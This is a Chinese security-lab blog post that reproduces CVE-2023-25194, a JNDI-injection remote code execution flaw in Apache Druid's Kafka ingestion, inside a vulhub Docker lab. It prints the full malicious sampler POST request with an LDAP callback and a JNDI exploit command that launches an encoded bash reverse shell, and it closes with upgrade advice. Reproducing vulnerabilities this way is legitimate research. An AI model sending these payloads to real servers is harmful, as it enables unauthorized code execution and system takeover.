点击蓝字 关注我们
日期:2024年10月29日 作者:pbfochk 介绍:CVE-2023-25194 Apache Druid RCE 漏洞。
0x01 漏洞简介
Apache Kafka
是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect
是一种用于在 kafka
和其他系统之间可扩展、可靠的流式传输数据的工具。
在 Apache Druid
使用 Apache Kafka
加载数据的场景下,未经身份认证的远程攻击者可配置 Kafka
连接属性,从而利用 CVE-2023-25194
漏洞触发 JNDI
注入,最终执行任意代码。(其他使用 Apache Kafka Connect
的产品也可能受 CVE-2023-25194
漏洞影响)
影响范围:
0.19.0 <= Apache Druid <= 25.0.0
2.3.0 <= Apache Kafka版本 <= 3.3.2
0x02 环境部署
环境用 github
的 vulhub
,docker
搭建:
环境地址:
https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194
漏洞访问:
http://vps:8888
0x03 漏洞复现
3.1 检测环境
填写数据进行抓包:
测试 dnslog
:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: ip:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1400
Origin: http://124.221.116.113:8888
Connection: close
Referer: http://124.221.116.113:8888/unified-console.html
Priority: u=0
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://bcgufe.dnslog.cn" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"
},
"topic":"test",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\s\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
3.2 漏洞利用
尝试反弹 shell
,获取权限:
vps
开启监听:
bash
编码:
启动恶意的 JNDI
服务器:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaC0000000000000000A+JjE=}|{base64,-d}|{bash,-i}" -A ip
更换 ldap
的内容,burp
发包:
反弹 shell
成功:
0x04 修复建议
升级至:Apache Kafka 3.4.0
及以上版本。
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
点此亲启
原文始发于微信公众号(宸极实验室):『漏洞复现』Apache Druid RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论